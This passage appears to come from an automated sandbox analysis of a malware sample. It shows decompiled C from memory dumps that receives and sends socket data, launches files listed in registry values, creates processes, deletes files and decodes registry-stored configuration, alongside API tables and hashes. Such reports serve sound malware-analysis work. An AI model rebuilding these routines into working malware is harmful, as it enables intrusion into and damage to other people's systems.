                                						_t46 =  *_t62;
                                						if(_t46 != 0 && _t46 <= 0x20) {
                                							goto L9;
                                						}
                                						_v52 = 0;
                                						_t48 =  *0x68( &_v96);
                                						_a722216000 = _a722216000 + _t55;
                                						_t41 = _t48 & 0x0000000c;
                                						_push(0);
                                						_push(_t62);
                                						_push(_t59);
                                					}
                                					 *_t41 = _t65;
                                					_push( *0x4827dc ^ _t41);
                                					_v20 = _t70;
                                					_push(_v8);
                                					_v8 = 0xffffffff;
                                					_t23 =  &_v16; // -12
                                					_t44 = _t23;
                                					 *[fs:0x0] = _t44;
                                					return _t44;
                                				} else {
                                					_v8 = _v8 | 0xffffffff;
                                					 *[fs:0x0] = _v20;
                                					return _t41;
                                				}
                                			}






























                                0x0228ecf0
                                0x0228ecf0
                                0x0228ecf2
                                0x0228ecf4
                                0x0228ecf6
                                0x0228ecf8
                                0x0228ecfa
                                0x0228ecfc
                                0x0228ecfe
                                0x0228ed00
                                0x0228ed02
                                0x0228ed04
                                0x0228ed05
                                0x0228ed07
                                0x0228ed09
                                0x0228ed0b
                                0x0228ed0d
                                0x0228ed0f
                                0x0228ed11
                                0x0228ed13
                                0x0228ed15
                                0x0228ed17
                                0x0228ed19
                                0x0228ed1b
                                0x0228ed1d
                                0x0228ed1f
                                0x0228ed21
                                0x0228ed23
                                0x0228ed25
                                0x0228ed27
                                0x0228ed29
                                0x0228ed2b
                                0x0228ed2d
                                0x0228ed2f
                                0x0228ed31
                                0x0228ed33
                                0x0228ed35
                                0x0228ed37
                                0x0228ed39
                                0x0228ed3b
                                0x0228ed3d
                                0x0228ed3f
                                0x0228ed41
                                0x0228ed43
                                0x0228ed45
                                0x0228ed47
                                0x0228ed49
                                0x0228ed4b
                                0x0228ed4d
                                0x0228ed4f
                                0x0228ed51
                                0x0228ed53
                                0x0228ed55
                                0x0228ed57
                                0x0228ed59
                                0x0228ed5b
                                0x0228ed5d
                                0x0228ed5f
                                0x0228ed61
                                0x0228ed63
                                0x0228ed65
                                0x0228ed67
                                0x0228ed69
                                0x0228ed6b
                                0x0228ed6d
                                0x0228ed6f
                                0x0228ed71
                                0x0228ed73
                                0x0228ed75
                                0x0228ed77
                                0x0228ed79
                                0x0228ed7b
                                0x0228ed7d
                                0x0228ed7f
                                0x0228ed81
                                0x0228ed83
                                0x0228ed85
                                0x0228ed87
                                0x0228ed89
                                0x0228ed8b
                                0x0228ed8d
                                0x0228ed8f
                                0x0228ed91
                                0x0228ed93
                                0x0228ed95
                                0x0228ed97
                                0x0228ed99
                                0x0228ed9b
                                0x0228ed9d
                                0x0228ed9f
                                0x0228eda1
                                0x0228eda3
                                0x0228eda5
                                0x0228eda7
                                0x0228eda9
                                0x0228edab
                                0x0228edad
                                0x0228edaf
                                0x0228edb1
                                0x0228edb3
                                0x0228edb5
                                0x0228edb7
                                0x0228edb9
                                0x0228edbb
                                0x0228edbd
                                0x0228edbf
                                0x0228edc1
                                0x0228edc3
                                0x0228edc5
                                0x0228edc7
                                0x0228edc9
                                0x0228edcb
                                0x0228edcd
                                0x0228edcf
                                0x0228edd1
                                0x0228edd3
                                0x0228edd5
                                0x0228edd7
                                0x0228edd9
                                0x0228eddb
                                0x0228eddd
                                0x0228eddf
                                0x0228ede1
                                0x0228ede3
                                0x0228ede5
                                0x0228ede7
                                0x0228ede9
                                0x0228edeb
                                0x0228eded
                                0x0228edef
                                0x0228edf1
                                0x0228edf3
                                0x0228edf5
                                0x0228edf7
                                0x0228edf9
                                0x0228edfb
                                0x0228edfd
                                0x0228edff
                                0x0228ee01
                                0x0228ee03
                                0x0228ee05
                                0x0228ee07
                                0x0228ee09
                                0x0228ee0b
                                0x0228ee0d
                                0x0228ee0f
                                0x0228ee11
                                0x0228ee13
                                0x0228ee15
                                0x0228ee17
                                0x0228ee19
                                0x0228ee1b
                                0x0228ee1d
                                0x0228ee1f
                                0x0228ee21
                                0x0228ee23
                                0x0228ee25
                                0x0228ee27
                                0x0228ee29
                                0x0228ee2b
                                0x0228ee2d
                                0x0228ee2f
                                0x0228ee31
                                0x0228ee33
                                0x0228ee35
                                0x0228ee37
                                0x0228ee39
                                0x0228ee3b
                                0x0228ee3d
                                0x0228ee3f
                                0x0228ee41
                                0x0228ee43
                                0x0228ee45
                                0x0228ee47
                                0x0228ee49
                                0x0228ee4b
                                0x0228ee4d
                                0x0228ee4f
                                0x0228ee51
                                0x0228ee53
                                0x0228ee55
                                0x0228ee57
                                0x0228ee59
                                0x0228ee5b
                                0x0228ee5d
                                0x0228ee5f
                                0x0228ee61
                                0x0228ee63
                                0x0228ee65
                                0x0228ee67
                                0x0228ee69
                                0x0228ee6b
                                0x0228ee6d
                                0x0228ee6f
                                0x0228ee71
                                0x0228ee73
                                0x0228ee75
                                0x0228ee77
                                0x0228ee79
                                0x0228ee7b
                                0x0228ee7d
                                0x0228ee7f
                                0x0228ee81
                                0x0228ee83
                                0x0228ee85
                                0x0228ee87
                                0x0228ee89
                                0x0228ee8b
                                0x0228ee8d
                                0x0228ee8f
                                0x0228ee91
                                0x0228ee93
                                0x0228ee95
                                0x0228ee97
                                0x0228ee99
                                0x0228ee9b
                                0x0228ee9d
                                0x0228ee9f
                                0x0228eea1
                                0x0228eea3
                                0x0228eea5
                                0x0228eea7
                                0x0228eea9
                                0x0228eeab
                                0x0228eead
                                0x0228eeaf
                                0x0228eeb1
                                0x0228eeb3
                                0x0228eeb5
                                0x0228eeb7
                                0x0228eeb9
                                0x0228eebb
                                0x0228eebd
                                0x0228eebf
                                0x0228eec1
                                0x0228eec3
                                0x0228eec5
                                0x0228eec7
                                0x0228eec9
                                0x0228eecb
                                0x0228eecd
                                0x0228eecf
                                0x0228eed1
                                0x0228eed3
                                0x0228eed6
                                0x0228eed9
                                0x0228eeee
                                0x0228eef5
                                0x0228eefb
                                0x0228ef00
                                0x0228ef05
                                0x0228ef07
                                0x0228ef0e
                                0x0228ef15
                                0x0228ef28
                                0x0228ef2a
                                0x0228ef30
                                0x0228ef36
                                0x0228ef3f
                                0x0228ef44
                                0x0228ef4f
                                0x0228ef56
                                0x0228ef5c
                                0x0228ef5c
                                0x0228ef5d
                                0x0228ef6c
                                0x0228ef76
                                0x0228ef8f
                                0x0228ef95
                                0x0228ef9a
                                0x0228ef9f
                                0x0228efa4
                                0x0228efa7
                                0x0228efac
                                0x0228efb0
                                0x0228efc5
                                0x0228efcc
                                0x0228efce
                                0x0228efce
                                0x0228efd0
                                0x0228efd3
                                0x0228efd6
                                0x0228efe5
                                0x0228efe7
                                0x0228efe7
                                0x0228efe9
                                0x0228efe9
                                0x0228efec
                                0x0228eff2
                                0x00000000
                                0x00000000
                                0x0228effa
                                0x0228f001
                                0x0228f007
                                0x0228f00d
                                0x0228f010
                                0x0228f011
                                0x0228f012
                                0x0228f012
                                0x0228f013
                                0x0228f01e
                                0x0228f01f
                                0x0228f022
                                0x0228f025
                                0x0228f02c
                                0x0228f02c
                                0x0228f02f
                                0x0228f035
                                0x0228efb2
                                0x0228efb2
                                0x0228efb9
                                0x0228efc4
                                0x0228efc4

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: __p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs
                                • String ID:
                                • API String ID: 3842468306-0
                                • Opcode ID: 6aaa078fb9597862f62cdc0ce5f619303c973e32aa957df4eecb830079f0879d
                                • Instruction ID: 6b44ddbdfac4994e5e189bdc4323fa89064051f2d8eaedc48601a5f1c3321f6f
                                • Opcode Fuzzy Hash: 6aaa078fb9597862f62cdc0ce5f619303c973e32aa957df4eecb830079f0879d
                                • Instruction Fuzzy Hash: 7A217F72902304EFC711EFA4EE49A597F78F705725F10423AE615B72E4D7749604CB68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 55%
                                			E0220811C(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                				char _v8;
                                				intOrPtr _v132;
                                				void _v135;
                                				char _v136;
                                				void* _v140;
                                				void* _t39;
                                				intOrPtr* _t41;
                                				intOrPtr _t56;
                                				intOrPtr _t62;
                                
                                				_v140 = 0;
                                				_v8 = 0;
                                				_v136 = 0;
                                				memset( &_v135, 0, 0x1f << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_t39 = E02207FA9(_a4,  &_v136, 9, 0x61a8);
                                				if(_t39 == 0) {
                                					L15:
                                					if(_a4 == 0 || _a4 == 0xffffffff) {
                                						return _t39;
                                					} else {
                                						return  *0x21e11f0(_a4);
                                					}
                                				}
                                				if(_v136 >= 0x100000 || _v136 <= 0x400) {
                                					__eflags = _a8;
                                					if(_a8 != 0) {
                                						_t41 =  *0x22882b8; // 0x0
                                						_t56 =  *_t41 + 8;
                                						__eflags = _t56;
                                						_t62 =  *0x22882b8; // 0x0
                                						_t39 =  *0x21e11d4(_a4, _t62, _t56, 0);
                                					}
                                				} else {
                                					_v140 = GlobalAlloc(0x40, _v136 + 0x1000);
                                					E0221772B(_v140,  &_v136, 8);
                                					_v8 = 0;
                                					while(_v8 < _v136) {
                                						_t20 = _v8 + 8; // 0x8
                                						_v8 = _v8 +  *0x21e11d8(_a4, _v140 + _t20, 0x400, 0);
                                						if(_v8 > 0) {
                                							continue;
                                						}
                                						break;
                                					}
                                					_t39 = E02204145(_v140 + 8, _v136);
                                					_t84 = _v132 - _t39;
                                					if(_v132 == _t39) {
                                						_t39 = E02206330(_v140, _t84, _v140, 1);
                                					}
                                					if(_v140 != 0) {
                                						_t39 = GlobalFree(_v140);
                                					}
                                				}
                                			}












                                0x02208126
                                0x02208130
                                0x02208137
                                0x0220814b
                                0x0220814d
                                0x0220814f
                                0x02208162
                                0x0220816c
                                0x02208273
                                0x02208277
                                0x0220828d
                                0x0220827f
                                0x00000000
                                0x02208283
                                0x02208277
                                0x0220817c
                                0x0220824f
                                0x02208253
                                0x02208257
                                0x0220825e
                                0x0220825e
                                0x02208262
                                0x0220826d
                                0x0220826d
                                0x02208192
                                0x022081a7
                                0x022081bd
                                0x022081c5
                                0x022081cc
                                0x022081e7
                                0x022081fb
                                0x02208202
                                0x00000000
                                0x02208206
                                0x00000000
                                0x02208204
                                0x02208219
                                0x02208221
                                0x02208224
                                0x0220822f
                                0x02208234
                                0x0220823e
                                0x02208247
                                0x02208247
                                0x0220824d

                                APIs
                                  • Part of subcall function 02207FA9: select.WS2_32(00000000,00000000,00000000,00000000,00000000), ref: 022080DA
                                • GlobalAlloc.KERNEL32(00000040,-00000C00,?,?,?,?), ref: 022081A1
                                • recv.WS2_32(00000000,00000008,00000400,00000000), ref: 022081F0
                                • GlobalFree.KERNEL32(00000000), ref: 02208247
                                • send.WS2_32(00000000,00000000,?,00000000), ref: 0220826D
                                • closesocket.WS2_32(000000FF), ref: 02208283
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: Global$AllocFreeclosesocketrecvselectsend
                                • String ID:
                                • API String ID: 424924859-0
                                • Opcode ID: 0fdce999cdeeeb2e9968d51dec6ed2ea484c7713280877c0e3cfcbae20391529
                                • Instruction ID: f1c8ddea0befda84f15dff2a8187a13d5c747d2ef25b0b8d0e1289cd35888b1a
                                • Opcode Fuzzy Hash: 0fdce999cdeeeb2e9968d51dec6ed2ea484c7713280877c0e3cfcbae20391529
                                • Instruction Fuzzy Hash: FF416F70950209EFDF24CBD4CC84B9AB3B5BB98305F008598E649AA2C5DBB49ED4CF52
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetSystemDirectoryA.KERNEL32(00000000,00000080), ref: 02209322
                                • lstrlen.KERNEL32(00000000), ref: 0220932F
                                • lstrcat.KERNEL32(00000000,02203C90), ref: 0220934E
                                • lstrcat.KERNEL32(00000000,02202288), ref: 02209362
                                • lstrcat.KERNEL32(00000000,0220268C), ref: 02209375
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: lstrcat$DirectorySystemlstrlen
                                • String ID:
                                • API String ID: 3692445580-0
                                • Opcode ID: 49ec310fe84ab24a0521e9840f229de27e42880cabafbfa7613e44c1969cc8b7
                                • Instruction ID: 92ae7326684b4f0f260571ae4f242422afff10b046970f4dd75af5c369b847b4
                                • Opcode Fuzzy Hash: 49ec310fe84ab24a0521e9840f229de27e42880cabafbfa7613e44c1969cc8b7
                                • Instruction Fuzzy Hash: 2C215EBAE90214EBCB509BA4DC48FAA77B8BB48701F004998B709A7181CB705AD58F64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 90%
                                			E02211D8F(char* _a4) {
                                				int _v8;
                                				void _v263;
                                				char _v264;
                                				long _v268;
                                				void* _v272;
                                				int _v276;
                                				void* _t46;
                                				void* _t47;
                                
                                				_v8 = 0x100;
                                				_v276 = 0;
                                				_v264 = 0;
                                				memset( &_v263, 0, 0x3f << 2);
                                				_t47 = _t46 + 0xc;
                                				asm("stosw");
                                				asm("stosb");
                                				if(RegOpenKeyExA(0x80000001, _a4, 0, 9,  &_v272) == 0) {
                                					while(1) {
                                						_v8 = 0x100;
                                						_v264 = 0;
                                						_v268 = RegEnumValueA(_v272, _v276,  &_v264,  &_v8, 0, 0, 0, 0);
                                						if(_v268 != 0) {
                                							break;
                                						}
                                						if(_v264 != 0) {
                                							__eflags = GetFileAttributesA( &_v264) - 0xffffffff;
                                							if(__eflags != 0) {
                                								E0220E329( &_v264, __eflags,  &_v264, 0, 0);
                                								_t47 = _t47 + 0xc;
                                							}
                                							_v276 = _v276 + 1;
                                							Sleep(0x100);
                                							__eflags = _v268 - 0x103;
                                							if(_v268 != 0x103) {
                                								continue;
                                							}
                                						} else {
                                						}
                                						goto L9;
                                					}
                                				}
                                				L9:
                                				return RegCloseKey(_v272);
                                			}











                                0x02211d99
                                0x02211da0
                                0x02211daa
                                0x02211dbe
                                0x02211dbe
                                0x02211dc0
                                0x02211dc2
                                0x02211ddf
                                0x02211de5
                                0x02211de5
                                0x02211dec
                                0x02211e1a
                                0x02211e27
                                0x00000000
                                0x00000000
                                0x02211e32
                                0x02211e43
                                0x02211e46
                                0x02211e53
                                0x02211e58
                                0x02211e58
                                0x02211e68
                                0x02211e73
                                0x02211e79
                                0x02211e83
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02211e34
                                0x00000000
                                0x02211e32
                                0x02211e5d
                                0x02211e89
                                0x02211e9a

                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000009,?), ref: 02211DD7
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 02211E14
                                • GetFileAttributesA.KERNEL32(00000000), ref: 02211E3D
                                • Sleep.KERNEL32(00000100), ref: 02211E73
                                • RegCloseKey.ADVAPI32(?), ref: 02211E90
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: AttributesCloseEnumFileOpenSleepValue
                                • String ID:
                                • API String ID: 684116133-0
                                • Opcode ID: 2f59b9ced94c8be5585b2d9693e0f9ba7da065e77bba869abd9b3a640ca6b21a
                                • Instruction ID: 1c6f314f8aabb784ff4d3c1c5aeb11922843b5262f73290a7325b1428a7d4b81
                                • Opcode Fuzzy Hash: 2f59b9ced94c8be5585b2d9693e0f9ba7da065e77bba869abd9b3a640ca6b21a
                                • Instruction Fuzzy Hash: A0214C75E10218EBDB20CBE4CC45BEAB7B8AB68700F1049D9E349AA180D7F05AD4CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • Sleep.KERNEL32(00001000), ref: 0220945E
                                • Sleep.KERNEL32(00000080), ref: 0220947B
                                • lstrlen.KERNEL32(00000000), ref: 02209495
                                • Sleep.KERNEL32(0002D000), ref: 022094BF
                                • RtlExitUserThread.NTDLL(00000000), ref: 022094EC
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: Sleep$ExitThreadUserlstrlen
                                • String ID:
                                • API String ID: 3026710222-0
                                • Opcode ID: 693b292372c5982ae561dfb3d48bdbe701af301e8252f09ffda30fb552c7d252
                                • Instruction ID: 62a5010c330d80170be8c195b001596c3d27519d7f73d84643b5c246039c2ba1
                                • Opcode Fuzzy Hash: 693b292372c5982ae561dfb3d48bdbe701af301e8252f09ffda30fb552c7d252
                                • Instruction Fuzzy Hash: 94216D70E94208EBDB008FE4DC49BAEB7B4FB09B55F004A19E51AA63C5C7795850CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 0220A220
                                • GetFileAttributesA.KERNEL32(00000000), ref: 0220A236
                                • DeleteFileA.KERNEL32(00000000), ref: 0220A24A
                                • Sleep.KERNEL32(00002800), ref: 0220A255
                                • RtlExitUserThread.NTDLL(00000000), ref: 0220A25F
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: File$AttributesDeleteExitSleepThreadUserlstrcpy
                                • String ID:
                                • API String ID: 1172011736-0
                                • Opcode ID: c068bbaaa896db27c4755d507396b688a65d7de6429f17cee1f688afcb6531a2
                                • Instruction ID: 23e9d1359cf2149f5339a8cf602c3c4a993e2b425d80b7c05bb58d251547cb66
                                • Opcode Fuzzy Hash: c068bbaaa896db27c4755d507396b688a65d7de6429f17cee1f688afcb6531a2
                                • Instruction Fuzzy Hash: 27F0F436D50304ABEB108BF4DC8CBAB77B8BB48300F5006B9E61AD51C1DBB29994CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 41%
                                			E02204631(CHAR* _a4) {
                                				void _v263;
                                				char _v264;
                                				CHAR* _v268;
                                				struct _STARTUPINFOA _v336;
                                				struct _PROCESS_INFORMATION _v352;
                                				int _t48;
                                				void* _t67;
                                
                                				_v336.cb = 0;
                                				memset( &(_v336.lpReserved), 0, 0x10 << 2);
                                				_v352.hProcess = 0;
                                				_v352.hThread = 0;
                                				_v352.dwProcessId = 0;
                                				_v352.dwThreadId = 0;
                                				_v264 = 0;
                                				memset( &_v263, 0, 0x40 << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v268 = 0;
                                				_v336.cb = 0x44;
                                				_v336.lpReserved = 0;
                                				_v336.lpDesktop = 0;
                                				_v336.lpTitle = 0;
                                				_v336.dwFlags = 1;
                                				_v336.cbReserved2 = 0;
                                				_v336.lpReserved2 = 0;
                                				_v336.wShowWindow = 0;
                                				 *0x21e1148( &_v264, _a4);
                                				_v268 =  *0x21e114c( &_v264) - 1;
                                				while(_v268 > 0) {
                                					if( *((char*)(_t67 + _v268 - 0x104)) != 0x5c) {
                                						_v268 = _v268 - 1;
                                						continue;
                                					} else {
                                						 *((char*)(_t67 + _v268 - 0x103)) = 0;
                                					}
                                					break;
                                				}
                                				_t48 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0,  &_v264,  &_v336,  &_v352);
                                				_v268 = _t48;
                                				return _t48;
                                			}










                                0x0220463b
                                0x02204652
                                0x02204654
                                0x02204660
                                0x02204666
                                0x0220466c
                                0x02204672
                                0x02204686
                                0x02204688
                                0x0220468a
                                0x0220468b
                                0x02204695
                                0x0220469f
                                0x022046a9
                                0x022046b3
                                0x022046bd
                                0x022046c7
                                0x022046d0
                                0x022046da
                                0x022046ee
                                0x02204704
                                0x0220471b
                                0x02204735
                                0x02204715
                                0x00000000
                                0x02204737
                                0x0220473d
                                0x0220473d
                                0x00000000
                                0x02204735
                                0x0220476e
                                0x02204774
                                0x0220477e

                                APIs
                                • lstrcpy.KERNEL32(?,?), ref: 022046EE
                                • lstrlen.KERNEL32(?), ref: 022046FB
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 0220476E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: CreateProcesslstrcpylstrlen
                                • String ID: D
                                • API String ID: 2742767947-2746444292
                                • Opcode ID: de7bbab32f713a79755cc1c88b0ea724918e743bfc41686a56bac6d5c956093c
                                • Instruction ID: cb6a2b4b6ce99cb03ea622a03d4309b27bc91c34b97f1c764813b73950b0bcbc
                                • Opcode Fuzzy Hash: de7bbab32f713a79755cc1c88b0ea724918e743bfc41686a56bac6d5c956093c
                                • Instruction Fuzzy Hash: 85310BB1914228DFDB60CFA4CC987DABBB4AB55304F0081D9D28DAA290DBB55AC4CF80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E02205A6A() {
                                				char _t51;
                                				signed int _t54;
                                				void* _t77;
                                				void* _t79;
                                
                                				L0:
                                				while(1) {
                                					L0:
                                					_t50 =  *(_t77 - 0x228) + 1;
                                					 *(_t77 - 0x228) = _t50;
                                					 *(_t77 - 4) =  &(( *(_t77 - 4))[0x14]);
                                					if( *(_t77 - 0x220) == 0 ||  *(_t77 - 0x228) >= 0x3e8) {
                                						break;
                                					}
                                					L3:
                                					 *(_t77 - 0x224) =  *(_t77 - 4);
                                					 *(_t77 - 0x22c) = 1;
                                					L5:
                                					while( *(_t77 - 0x22c) < 5) {
                                						_t51 = "alfoC:\\Windows\\"; // 0x6f666c61
                                						wsprintfA(_t77 - 0x10c, "%c%d_%d", _t51,  *(_t77 - 0x22c),  *(_t77 - 0x228));
                                						_t79 = _t79 + 0x14;
                                						 *(_t77 - 0x21c) = 4;
                                						 *(_t77 - 0x218) = 0;
                                						if(RegQueryValueExA( *(_t77 - 0x230), _t77 - 0x10c, 0, 0, _t77 - 0x218, _t77 - 0x21c) == 0) {
                                							L8:
                                							_t54 = "alfoC:\\Windows\\"; // 0x6f666c61
                                							 *(_t77 - 0x218) =  *(_t77 - 0x218) ^ _t54 *  *(_t77 - 0x228);
                                							 *(_t77 - 0x238) =  *(_t77 - 0x22c);
                                							 *(_t77 - 0x238) =  *(_t77 - 0x238) - 1;
                                							if( *(_t77 - 0x238) <= 3) {
                                								L9:
                                								switch( *((intOrPtr*)( *(_t77 - 0x238) * 4 +  &M02205C16))) {
                                									case 0:
                                										L10:
                                										 *( *(_t77 - 0x224)) =  *(_t77 - 0x218);
                                										goto L14;
                                									case 1:
                                										L11:
                                										 *((short*)( *((intOrPtr*)(__ebp - 0x224)) + 4)) =  *((intOrPtr*)(__ebp - 0x218));
                                										goto L14;
                                									case 2:
                                										L12:
                                										 *((intOrPtr*)( *((intOrPtr*)(__ebp - 0x224)) + 8)) =  *((intOrPtr*)(__ebp - 0x218));
                                										goto L14;
                                									case 3:
                                										L13:
                                										 *((intOrPtr*)( *((intOrPtr*)(__ebp - 0x224)) + 0xc)) =  *((intOrPtr*)(__ebp - 0x218));
                                										goto L14;
                                								}
                                							}
                                							L14:
                                							L4:
                                							_t50 =  *(_t77 - 0x22c) + 1;
                                							 *(_t77 - 0x22c) =  *(_t77 - 0x22c) + 1;
                                							continue;
                                						} else {
                                							L7:
                                							 *(_t77 - 0x220) = 0;
                                						}
                                						break;
                                					}
                                					L15:
                                					( *(_t77 - 0x224))[0x10] = 0;
                                				}
                                				L16:
                                				if( *(_t77 - 0x230) != 0) {
                                					_t50 = RegCloseKey( *(_t77 - 0x230)); // executed
                                				}
                                				return _t50;
                                			}







                                0x02205a6a
                                0x02205a6a
                                0x02205a6a
                                0x02205a70
                                0x02205a73
                                0x02205a7f
                                0x02205a89
                                0x00000000
                                0x00000000
                                0x02205a9f
                                0x02205aa2
                                0x02205aa8
                                0x00000000
                                0x02205ac3
                                0x02205ade
                                0x02205af0
                                0x02205af6
                                0x02205af9
                                0x02205b03
                                0x02205b35
                                0x02205b46
                                0x02205b46
                                0x02205b5a
                                0x02205b66
                                0x02205b75
                                0x02205b82
                                0x02205b84
                                0x02205b8a
                                0x00000000
                                0x02205b91
                                0x02205b9d
                                0x00000000
                                0x00000000
                                0x02205ba1
                                0x02205bae
                                0x00000000
                                0x00000000
                                0x02205bb4
                                0x02205bc0
                                0x00000000
                                0x00000000
                                0x02205bc5
                                0x02205bd1
                                0x00000000
                                0x00000000
                                0x02205b8a
                                0x02205bd4
                                0x02205ab4
                                0x02205aba
                                0x02205abd
                                0x00000000
                                0x02205b37
                                0x02205b37
                                0x02205b37
                                0x02205b37
                                0x00000000
                                0x02205b35
                                0x02205bd9
                                0x02205bdf
                                0x02205bdf
                                0x02205beb
                                0x02205bf2
                                0x02205bfb
                                0x02205bfb
                                0x02205c05

                                APIs
                                • wsprintfA.USER32 ref: 02205AF0
                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 02205B2D
                                • RegCloseKey.KERNELBASE(00000000), ref: 02205BFB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: CloseQueryValuewsprintf
                                • String ID: %c%d_%d$alfoC:\Windows\
                                • API String ID: 2691868063-3403567818
                                • Opcode ID: 225f390e193556fcb4ff1b2b4ee522b6ef21893757a80cadbb82ccc3195009c3
